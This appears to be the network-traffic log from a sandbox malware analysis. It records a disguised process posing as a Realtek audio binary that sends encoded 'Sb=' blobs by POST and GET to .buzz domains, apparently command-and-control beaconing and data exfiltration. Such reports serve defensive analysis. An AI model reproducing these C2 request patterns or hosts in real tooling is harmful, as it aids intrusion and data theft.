                                                                                        Data Raw: 53 62 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 74 63 61 76 31 48 5a 46 35 57 6f 2b 71 62 59 4e 58 7a 49 2b 6a 72 77 76 72 67 4d 2b 4c 4a 6b 53 2b 6a 61 56 71 78 68 63 6c 53 34 6e 7a 7a 75 45 61 75 49 45 41 62 50 4c 5a 46 6d 54 61 48 5a 33 6c 78 52 71 71 52 71 47 50 38 61 33 44 39 38 6e 57 54 53 39 6f 56 67 4d 48 70 42 72 32 2b 70 37 46 63 2b 74 59 6b 38 55 78 55 55 7a 51 6e 42 32 66 41 4b 63 63 68 43 37 75 77 61 73 32 6c 67 4c 54 31 78 2b 68 6a 62 77 51 57 4d 6c 39 38 47 32 4d 47 44 38 42 49 57 44 62 4a 2b 68 2f 64 4e 78 4d 48 6e 4a 7a 57 37 52 6f 6f 38 39 51 32 35 59 4c 34 6b 75 72 51 3d 3d
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGtcav1HZF5Wo+qbYNXzI+jrwvrgM+LJkS+jaVqxhclS4nzzuEauIEAbPLZFmTaHZ3lxRqqRqGP8a3D98nWTS9oVgMHpBr2+p7Fc+tYk8UxUUzQnB2fAKcchC7uwas2lgLT1x+hjbwQWMl98G2MGD8BIWDbJ+h/dNxMHnJzW7Roo89Q25YL4kurQ==
                                                                                        Dec 12, 2024 21:54:31.194598913 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:30 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: 87455315-fe22-4fd1-8a59-f25429d6c7ec
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=87455315-fe22-4fd1-8a59-f25429d6c7ec; expires=Thu, 12 Dec 2024 21:09:31 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:31.194617033 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODc0NTUzMTUtZmUyMi00ZmQxLThhNTktZjI1NDI5ZDZjN2VjIiwicGFnZV90aW1lIjoxNzM0MDM2ODcxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.11.2049721199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:33.720623970 CET688OUTPOST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 72 39 71 76 32 67 4e 46 31 6d 6f 39 6d 37 59 4e 4f 6a 49 36 6a 72 4d 76 72 68 34 55 4c 62 41 53 2b 43 71 56 70 30 42 63 6b 53 34 6e 72 44 75 46 65 75 49 78 41 62 7a 44 5a 46 71 54 61 48 4e 33 6c 77 68 71 71 6d 2b 5a 50 73 61 78 4c 64 38 6c 4c 44 53 39 6f 56 67 4d 48 70 56 42 32 2b 42 37 46 76 32 74 59 46 39 6d 76 45 55 77 54 6e 42 32 62 41 4b 59 63 68 44 75 75 78 47 43 32 6e 59 4c 54 31 68 2b 68 33 48 2f 66 57 4d 72 35 38 48 31 4c 57 57 76 61 38 7a 33 49 70 2b 66 2b 73 31 79 4a 52 71 54 75 6b 50 31 72 37 67 50 55 47 41 77 4a 36 6c 31 32 52 57 35 37 62 5a 74 6a 72 66 63 45 77 77 4e 45 5a 44 6d 70 31 59 3d
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGr9qv2gNF1mo9m7YNOjI6jrMvrh4ULbAS+CqVp0BckS4nrDuFeuIxAbzDZFqTaHN3lwhqqm+ZPsaxLd8lLDS9oVgMHpVB2+B7Fv2tYF9mvEUwTnB2bAKYchDuuxGC2nYLT1h+h3H/fWMr58H1LWWva8z3Ip+f+s1yJRqTukP1r7gPUGAwJ6l12RW57bZtjrfcEwwNEZDmp1Y=
                                                                                        Dec 12, 2024 21:54:33.852026939 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:33 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: cced1805-dbca-4672-9a15-f68c2566b7ba
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=cced1805-dbca-4672-9a15-f68c2566b7ba; expires=Thu, 12 Dec 2024 21:09:33 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:33.852073908 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2NlZDE4MDUtZGJjYS00NjcyLTlhMTUtZjY4YzI1NjZiN2JhIiwicGFnZV90aW1lIjoxNzM0MDM2ODczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.11.2049722199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:36.363010883 CET2578OUTPOST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 72 39 71 76 32 67 4e 46 31 6d 6f 39 6d 37 59 4e 4f 6a 49 36 6a 72 4d 76 72 68 34 55 4c 62 49 53 2b 51 69 56 70 53 4a 63 6a 53 34 6e 31 7a 75 41 65 75 49 57 41 66 6e 48 5a 46 57 70 61 46 31 33 6b 53 70 71 36 54 53 5a 42 73 61 78 48 39 38 6b 57 54 53 53 6f 56 51 51 48 70 46 42 32 2b 42 37 46 70 53 74 61 55 39 6d 74 45 55 7a 51 6e 42 36 66 41 4b 77 63 68 62 2b 75 78 43 38 32 58 34 4c 54 55 52 2b 6d 45 76 2f 53 57 4d 2b 2b 38 48 58 4c 57 4c 33 61 34 61 4d 49 70 4b 78 2b 76 46 79 49 58 44 59 33 57 44 55 76 39 30 6a 65 30 41 4d 4a 36 6c 2f 38 51 4f 41 31 64 52 53 68 2f 48 77 44 77 73 67 57 4c 6d 6d 38 6a 33 59 37 47 6d 4e 55 38 69 76 48 49 4b 4b 36 35 6a 5a 46 41 54 41 54 71 42 66 43 4c 62 56 6c 4f 78 2f 47 6c 74 42 77 32 68 41 63 67 48 59 43 62 70 41 57 7a 79 44 33 4c 78 6a 6f 77 41 41 6e 56 46 76 6a 4d 6f 62 6a 64 64 79 37 47 6d 58 6b 79 34 55 4f 77 4c 58 61 33 30 39 64 66 50 41 6e 6a 47 33 36 74 4f 41 55 38 38 70 44 69 32 4b 53 6d 55 76 61 38 70 75 6f 64 6b [TRUNCATED]
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGr9qv2gNF1mo9m7YNOjI6jrMvrh4ULbIS+QiVpSJcjS4n1zuAeuIWAfnHZFWpaF13kSpq6TSZBsaxH98kWTSSoVQQHpFB2+B7FpStaU9mtEUzQnB6fAKwchb+uxC82X4LTUR+mEv/SWM++8HXLWL3a4aMIpKx+vFyIXDY3WDUv90je0AMJ6l/8QOA1dRSh/HwDwsgWLmm8j3Y7GmNU8ivHIKK65jZFATATqBfCLbVlOx/GltBw2hAcgHYCbpAWzyD3LxjowAAnVFvjMobjddy7GmXky4UOwLXa309dfPAnjG36tOAU88pDi2KSmUva8puodkP7LWMGs3ti6Spu51uvlJovECcgbGtsy4GWqzRCSUkZjVdlLEyOMxIaAdAxpL4lBLw06n0xnzPdjEoOJ7QcUYTle0eHVeItFL8uc9UBu9REMpt3aI64JFETDYzHp/DlVCiltlcGp0nmmRBwDt7k0hB0FZRBXsLTxMyp5yyQk5RSwUGGn7e6nTd/SnPEc18fA4QQUiM3ahw99DXpyG1pzLJQrkmO8g/0XFmbOcsDOXcFLfXow+c5eSb3e11DYxPBDEobvoTlicMGYTZMjN+N6WHxP6QtP/K4E+Buy/ESyWq372YOXUg8IUrkiRZyxodqCJ4xGF5say1+esJy3aE4MZMPhzH+/CIwEZCG3c3qhYoALwBt/tKJXeuTr14vSx40gSasA/BTocWqzc3G+kWirFNS3m9l5U2oMMpENIVnx4ouSTZdrJ5pO2vwGSIuKdcIOoL/uhRUpsGz/P5zDmq2rOMaBIriUbGk0elfwynGSHuxCc+kHd9pJqn3SM8FQAh9SMFM7+3kacM9y2/vl5GComCG82nwsaY9x8KhmtamU4fYwfBhxY/rwLqPVnnbGAAM0Kv8ZqC0nu0bR886oTLmA9aaGiLukGyq1OeWEeBk45g+g4aRzulTYGYdJblyWDloKqRSTa7090B749RL01nv12ltGUU1kDEdSGKM [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:36.363084078 CET5259OUTData Raw: 46 56 67 48 4e 46 36 79 33 76 58 6d 4d 4f 73 76 38 43 39 44 32 61 49 30 59 4f 59 74 50 72 47 46 42 52 67 2f 48 6b 75 39 45 36 6e 44 48 53 4a 43 62 61 58 31 50 68 42 69 77 4b 62 67 47 31 6e 70 6f 75 42 30 53 64 56 55 79 69 7a 71 6a 45 70 64 7a 67
                                                                                        Data Ascii: FVgHNF6y3vXmMOsv8C9D2aI0YOYtPrGFBRg/Hku9E6nDHSJCbaX1PhBiwKbgG1npouB0SdVUyizqjEpdzgPU/BpJd1V7ofrD6a8Yrz8pOklgpHc2qTgqlc+ZwFjCvStaA7+jS8onojXuHry3MIwFG1W2vK1A7n9N09qxMQM5mSRwrBq9Hf9LAzxP0tDQS5fmLuq+SI3gCV3f/27tdQuNA9s0QPcsLMYQ1CkdWz8e913fXazrDs+
                                                                                        Dec 12, 2024 21:54:36.494647026 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:35 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: b849ef32-95d2-4714-aa55-8646019f4242
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=b849ef32-95d2-4714-aa55-8646019f4242; expires=Thu, 12 Dec 2024 21:09:36 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:36.494718075 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjg0OWVmMzItOTVkMi00NzE0LWFhNTUtODY0NjAxOWY0MjQyIiwicGFnZV90aW1lIjoxNzM0MDM2ODc2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.11.2049723199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:38.999013901 CET390OUTGET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:39.130281925 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:38 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1478
                                                                                        x-request-id: 25f0375b-85f4-41c6-a1d1-587f757e475f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==
                                                                                        set-cookie: parking_session=25f0375b-85f4-41c6-a1d1-587f757e475f; expires=Thu, 12 Dec 2024 21:09:39 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 5a 33 75 4c 4e 74 39 72 58 62 48 57 30 6b 36 50 56 35 4a 5a 35 45 54 62 2f 64 49 53 45 63 53 54 2b 71 4d 30 4e 62 39 49 76 7a 6e 6c 57 6f 7a 4f 47 66 70 6e 6f 4c 47 71 73 4c 51 4e 79 64 4c 43 79 51 50 6d 47 64 75 70 4a 68 64 30 68 42 32 47 41 53 52 32 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:39.130295038 CET878INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjVmMDM3NWItODVmNC00MWM2LWExZDEtNTg3Zjc1N2U0NzVmIiwicGFnZV90aW1lIjoxNzM0MDM2ODc5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.11.2049724172.67.131.144807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:44.415591955 CET644OUTPOST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 4c 33 33 46 63 77 62 49 79 33 56 74 30 47 79 34 37 32 79 37 54 76 44 46 76 51 4a 61 6e 48 5a 6f 41 77 45 43 43 72 46 31 57 69 6c 75 6f 69 56 37 75 2b 6b 6d 6f 6a 58 7a 35 75 58 42 73 72 54 73 49 6c 55 77 44 6d 69 2b 32 6e 78 33 69 51 37 61 4f 36 6e 58 4f 36 67 4a 47 44 6e 37 78 74 74 55 62 4e 47 50 30 30 55 44 4f 42 30 47 6a 52 73 38 4a 45 62 32 51 44 77 54 67 50 64 2b 32 71 32 50 69 62 71 2f 38 58 2f 57 73 75 46 45 50 66 57 33 51 2b 63 4d 4a 56 62 54 6c 41 2f 67 76 79 76 64 55 30 53 65 6c 75 75 79 73 39 4e 52 61 62 72 6e 4f 79 4d 68 72 41 3d 3d
                                                                                        Data Ascii: Sb=aMSFOt46gPEmL33FcwbIy3Vt0Gy472y7TvDFvQJanHZoAwECCrF1WiluoiV7u+kmojXz5uXBsrTsIlUwDmi+2nx3iQ7aO6nXO6gJGDn7xttUbNGP00UDOB0GjRs8JEb2QDwTgPd+2q2Pibq/8X/WsuFEPfW3Q+cMJVbTlA/gvyvdU0Seluuys9NRabrnOyMhrA==
                                                                                        Dec 12, 2024 21:54:44.703825951 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
